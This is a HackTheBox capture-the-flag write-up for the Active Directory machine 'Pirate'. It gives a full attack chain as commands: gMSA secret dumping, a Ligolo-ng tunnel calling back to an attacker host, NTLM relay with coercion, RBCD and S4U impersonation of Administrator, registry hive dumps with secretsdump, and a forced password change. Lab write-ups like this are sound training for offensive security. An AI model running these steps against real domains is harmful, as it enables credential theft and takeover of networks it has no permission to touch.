🏴‍☠️Pirate

https://app.hackthebox.com/machines/Pirate

Pirate — HackTheBox Writeup

Machine Information

Initial creds: pentest / p3nt3st2025!&

Recon

nmap -sC -sV -Pn -oN nmap_initial.txt <TARGET_IP>

Notable ports/services:

53 DNS
80 IIS
88 Kerberos
135/139/445 RPC/SMB
636/3268/3269 LDAP/LDAPS/GC

Local Config

`/etc/hosts`

<DC_IP>          DC01.pirate.htb DC01 pirate.htb MS01.pirate.htb

`/etc/krb5.conf`

[libdefaults]
    default_realm = PIRATE.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false
    rdns = false
    ticket_lifetime = 24h
    forwardable = true
    udp_preference_limit = 1

[realms]
    PIRATE.HTB = {
        kdc = DC01.pirate.htb
        admin_server = DC01.pirate.htb
        default_domain = pirate.htb
    }

[domain_realm]
    .pirate.htb = PIRATE.HTB
    pirate.htb = PIRATE.HTB

Enumeration / Attack Path Discovery

Used ADScan/BloodHound and identified these key edges:

Domain Secure Servers -> ReadGMSAPassword -> gMSA_ADFS_prod$
A.WHITE -> ForceChangePassword -> A.WHITE_ADM
A.WHITE_ADM -> AllowedToDelegate -> WEB01$

1) Get gMSA secrets

impacket-getTGT 'PIRATE.HTB/MS01$:ms01'
export KRB5CCNAME=MS01\$.ccache

python3 gMSADumper/gMSADumper.py -d pirate.htb -l dc01.pirate.htb -k

Use recovered gMSA_ADFS_prod$ NTLM hash.

2) WinRM to DC01 as gMSA

evil-winrm -i DC01.pirate.htb -u 'gMSA_ADFS_prod$' -H '<GMSA_ADFS_NTLM>'

If Kerberos/time issues appear:

sudo ntpdate <DC_IP>

3) Pivot to WEB01 with Ligolo-ng

On attacker:

./proxy -selfcert -laddr 0.0.0.0:443

On compromised Windows session:

.\agent.exe -connect <REDACTED_ATTACKER_IP>:443 -ignore-cert

On attacker, configure tunnel:

sudo ip tuntap add dev ligolo mode tun user kali
sudo ip addr add 192.168.100.50/24 dev ligolo
sudo ip link set ligolo up
sudo ip route replace 192.168.100.0/24 dev ligolo

Add ip to hosts

192.168.100.2 WEB01.pirate.htb

In Ligolo console:

session
1
start

4) NTLM relay + RBCD to WEB01

Start relay to DC LDAPS:

ntlmrelayx.py -t ldaps://<DC_IP> --delegate-access --remove-mic -smb2support

Trigger coercion from WEB01:

coercer coerce -l <REDACTED_ATTACKER_IP> -t 192.168.100.2 -d pirate.htb \
  -u 'gMSA_ADFS_prod$' --hashes :<GMSA_ADFS_NTLM> --always-continue

Relay should create a new machine account like:

NEWMACHINE$ / <RANDOM_PASSWORD>

Use it for S4U to WEB01:

impacket-getST -spn 'cifs/WEB01.pirate.htb' -impersonate 'Administrator' \
  'pirate.htb/NEWMACHINE$:NEWMACHINE_PASSWORD' -dc-ip <DC_IP>

export KRB5CCNAME=Administrator@cifs_WEB01.pirate.htb@PIRATE.HTB.ccache
impacket-wmiexec -k -no-pass 'pirate.htb/Administrator@WEB01.pirate.htb' -target-ip 192.168.100.2

5) Dump secrets from WEB01

From WEB01 shell:

reg save HKLM\SAM C:\Windows\Temp\sam.save
reg save HKLM\SYSTEM C:\Windows\Temp\system.save
reg save HKLM\SECURITY C:\Windows\Temp\security.save

From attacker:

impacket-smbclient -k -no-pass -target-ip 192.168.100.2 'pirate.htb/Administrator@WEB01.pirate.htb'
# use C$
# cd \Windows\Temp
# get sam.save
# get system.save
# get security.save

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Recovered useful credential:

a.white : E2nvAOKSz5Xz2MJu

Validate:

netexec smb <DC_IP> -d pirate.htb -u a.white -p 'E2nvAOKSz5Xz2MJu'

6) ForceChangePassword on `a.white_adm`

bloodyAD -d pirate.htb -u 'a.white' -p 'E2nvAOKSz5Xz2MJu' \
  --host <DC_IP> --dc-ip <DC_IP> \
  set password a.white_adm 'passW=RDq1'

netexec smb <DC_IP> -d pirate.htb -u a.white_adm -p 'passW=RDq1'

7) Constrained Delegation abuse (S4U)

Request ticket as Administrator for delegated service:

impacket-getST -spn 'HTTP/WEB01.pirate.htb' -impersonate 'Administrator' \
  'pirate.htb/a.white_adm:passW=RDq1' -dc-ip <DC_IP>

If you need service-name rewrite trick:

impacket-getST -spn 'HTTP/WEB01.pirate.htb' -altservice 'cifs/DC01.pirate.htb' \
  -impersonate 'Administrator' 'pirate.htb/a.white_adm:passW=RDq1' -dc-ip <DC_IP>

export KRB5CCNAME=Administrator@cifs_DC01.pirate.htb@PIRATE.HTB.ccache
klist

Then execute as Administrator on DC01 with Kerberos tooling (psexec / wmiexec / smbexec) depending on tool stability in your setup.

Result

Pivoted into internal network (192.168.100.0/24) via Ligolo
Gained Administrator on WEB01 via RBCD
Extracted credentials, pivoted to a.white then a.white_adm
Completed constrained delegation abuse path to obtain high-privileged Kerberos tickets

Last updated 10 days ago

hashtagPirate — HackTheBox Writeup

hashtagMachine Information

hashtagRecon

hashtagLocal Config

hashtag/etc/hosts

hashtag/etc/krb5.conf

hashtagEnumeration / Attack Path Discovery

hashtag1) Get gMSA secrets

hashtag2) WinRM to DC01 as gMSA

hashtag3) Pivot to WEB01 with Ligolo-ng

hashtag4) NTLM relay + RBCD to WEB01

hashtag5) Dump secrets from WEB01

hashtag6) ForceChangePassword on a.white_adm

hashtag7) Constrained Delegation abuse (S4U)

hashtagResult